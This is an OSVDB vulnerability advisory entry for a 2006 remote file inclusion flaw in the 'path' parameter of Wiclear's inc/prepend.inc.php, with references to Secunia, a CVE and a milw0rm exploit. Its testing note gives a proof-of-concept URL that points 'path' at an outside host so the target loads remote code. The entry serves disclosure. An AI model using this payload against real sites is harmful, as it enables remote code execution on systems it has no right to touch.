Wiclear inc/prepend.inc.php path Variable Remote File Inclusion

2006-10-23T08:18:49
ID OSVDB:29947
Type osvdb
Reporter OSVDB
Modified 2006-10-23T08:18:49

Description

Manual Testing Notes

http://[target]/[Path]/inc/prepend.inc.php?path=http://cmd.gif?

References:

Vendor URL: http://wiclear.free.fr/ Secunia Advisory ID:22547 Related OSVDB ID: 29945 Related OSVDB ID: 29948 Related OSVDB ID: 29944 Related OSVDB ID: 29943 Related OSVDB ID: 29946 Related OSVDB ID: 29942 Related OSVDB ID: 29949 Generic Exploit URL: http://milw0rm.com/exploits/2624 CVE-2006-5506